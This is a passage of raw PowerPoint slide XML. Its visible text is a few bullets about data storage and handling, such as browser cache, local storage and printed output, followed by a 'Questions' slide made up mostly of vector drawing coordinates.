            <a:pPr marL="755650" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="335"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="755015" algn="l"/>
                <a:tab pos="755650" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>may be binary or</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-35" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>text</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="350"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Browser’s </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>cache or other local</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>storage.</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Handling of printed</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>output.</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43</a:t>
            </a:fld>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs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99052" y="1006855"/>
            <a:ext cx="1859914" cy="574040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Questions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4490465" y="2563367"/>
            <a:ext cx="858519" cy="835660"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="858520" h="835660">
                <a:moveTo>
                  <a:pt x="858011" y="214122"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="820673" y="92964"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="774191" y="27432"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="689609" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="606551" y="9906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="503681" y="56388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="419099" y="157734"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="336041" y="240792"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="260603" y="352806"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="214121" y="464058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26669" y="473202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="529590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26669" y="556260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="204215" y="548640"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="204215" y="723351"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="233171" y="808482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="279653" y="835152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="382523" y="816102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="503681" y="760476"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="615695" y="677418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="718565" y="585216"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="811529" y="454152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="848105" y="342900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="858011" y="214122"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="858520" h="835660">
                <a:moveTo>
                  <a:pt x="204215" y="723351"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="204215" y="548640"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195071" y="696468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="204215" y="723351"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4443984" y="3443478"/>
            <a:ext cx="595630" cy="1226820"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="595629" h="1226820">
                <a:moveTo>
                  <a:pt x="595121" y="223266"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="595121" y="149352"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="576071" y="93726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="493013" y="19050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="380999" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="250697" y="28194"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="167639" y="103632"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="112013" y="213360"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55625" y="390144"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19049" y="566928"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="734568"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19049" y="918972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73151" y="1040130"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158495" y="1178814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241553" y="1226820"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="353567" y="1226820"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="446531" y="1216914"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="455675" y="1211315"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="455675" y="640080"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="465581" y="530352"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="493013" y="400050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="558545" y="288036"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="595121" y="223266"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="595629" h="1226820">
                <a:moveTo>
                  <a:pt x="585977" y="984504"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="558545" y="873252"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="483107" y="761238"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="455675" y="640080"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="455675" y="1211315"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="521207" y="1171194"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="576071" y="1086612"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="585977" y="984504"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4919471" y="3483102"/>
            <a:ext cx="661035" cy="1104265"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="661035" h="1104264">
                <a:moveTo>
                  <a:pt x="660654" y="685037"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="651510" y="639317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="361188" y="323849"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="166116" y="46481"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="110489" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7619" y="7619"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="54101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7620" y="109727"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54102" y="194309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185166" y="315467"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="305562" y="425195"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="436626" y="556259"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="519684" y="630935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="529590" y="658367"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="529590" y="750569"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="622554" y="713993"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="660654" y="685037"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="661035" h="1104264">
                <a:moveTo>
                  <a:pt x="529590" y="750569"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="529590" y="658367"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="502158" y="685037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="446531" y="704087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334518" y="723137"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241554" y="723137"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="156210" y="733043"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100584" y="750569"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64008" y="797051"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64008" y="861821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="119634" y="946404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="166116" y="992504"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="166116" y="835151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185166" y="797051"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241554" y="788669"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="400050" y="779525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="529590" y="750569"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="661035" h="1104264">
                <a:moveTo>
                  <a:pt x="446532" y="1075943"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="426720" y="1038605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334518" y="1010411"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="202692" y="898397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="166116" y="835151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="166116" y="992504"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="212598" y="1038605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="324612" y="1104138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="407670" y="1104138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="446532" y="1075943"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4490465" y="4408932"/>
            <a:ext cx="717550" cy="1659255"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="717550" h="1659254">
                <a:moveTo>
                  <a:pt x="614171" y="1542288"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="614171" y="1375410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="595121" y="1431036"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="512063" y="1431036"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="372617" y="1440180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="177545" y="1467612"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9143" y="1523238"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1542288"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79923" y="1658873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="145450" y="1658873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195071" y="1625346"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="307085" y="1559814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="474725" y="1523238"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="614171" y="1542288"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="717550" h="1659254">
                <a:moveTo>
                  <a:pt x="502157" y="93725"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="455675" y="19049"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="353567" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="326135" y="48006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="288035" y="121157"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="288035" y="297942"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="297179" y="483108"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334517" y="649986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="419099" y="836676"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="474725" y="952909"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="474725" y="455676"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="493013" y="268986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="502157" y="93725"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="717550" h="1659254">
                <a:moveTo>
                  <a:pt x="679703" y="1217676"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="641603" y="1050036"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="567689" y="883158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="474725" y="649986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="474725" y="952909"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="521207" y="1050036"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="587501" y="1217676"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="614171" y="1375410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="614171" y="1542288"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="670559" y="1555388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="670559" y="1365504"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="679703" y="1217676"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="717550" h="1659254">
                <a:moveTo>
                  <a:pt x="717041" y="1533144"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="707135" y="1477518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="670559" y="1421130"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="670559" y="1555388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="689609" y="1559814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="717041" y="1533144"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4136135" y="4456938"/>
            <a:ext cx="596265" cy="1383030"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="596264" h="1383029">
                <a:moveTo>
                  <a:pt x="483869" y="1225296"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="483869" y="1076706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="466343" y="1113282"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363473" y="1150620"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139445" y="1206246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9905" y="1261872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1299972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102869" y="1383030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="149351" y="1383030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="261365" y="1308354"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="371855" y="1251966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="483869" y="1225296"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="596264" h="1383029">
                <a:moveTo>
                  <a:pt x="576833" y="176784"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="558545" y="55625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="530351" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="446531" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="409955" y="55626"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="400811" y="157734"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="409955" y="381000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="427481" y="584454"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="446531" y="715518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="483869" y="918972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="483869" y="1225296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="512825" y="1218774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="512825" y="565404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="558545" y="305562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="576833" y="176784"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="596264" h="1383029">
                <a:moveTo>
                  <a:pt x="595883" y="1178814"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="595883" y="1057656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="576833" y="899922"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="520445" y="676656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="512825" y="565404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="512825" y="1218774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="568451" y="1206246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="595883" y="1178814"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4117085" y="2420111"/>
            <a:ext cx="978535" cy="1233805"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="978535" h="1233804">
                <a:moveTo>
                  <a:pt x="978408" y="83057"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="912876" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="827532" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="725424" y="46481"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="661416" y="167639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="576072" y="223265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="446532" y="240791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="213360" y="269747"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27432" y="325373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="371093"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17526" y="519683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83058" y="723899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139446" y="825121"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139446" y="398525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="297942" y="342899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="549402" y="315467"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="651510" y="325373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="678942" y="352043"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="707898" y="323562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="707898" y="259841"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="734568" y="176783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="810006" y="102107"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="866394" y="83057"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="939546" y="129539"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="978408" y="83057"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="978535" h="1233804">
                <a:moveTo>
                  <a:pt x="566928" y="1178052"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="549402" y="1094993"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="512064" y="982979"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="371856" y="852677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="232410" y="733043"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="166878" y="602741"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139446" y="398525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139446" y="825121"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="176022" y="890777"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="268986" y="1039367"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="353568" y="1140714"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="437388" y="1214627"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="520446" y="1233677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="566928" y="1178052"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="978535" h="1233804">
                <a:moveTo>
                  <a:pt x="725424" y="306323"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="707898" y="259841"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="707898" y="323562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="725424" y="306323"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5478017" y="2133600"/>
            <a:ext cx="260350" cy="304165"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="260350" h="304164">
                <a:moveTo>
                  <a:pt x="222504" y="219605"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="222504" y="137160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195072" y="182880"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="148590" y="192786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92964" y="182880"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36576" y="211836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7620" y="248412"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="294894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36576" y="304038"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54102" y="284988"/>
                </a:lnTo>
                <a:lnTo>
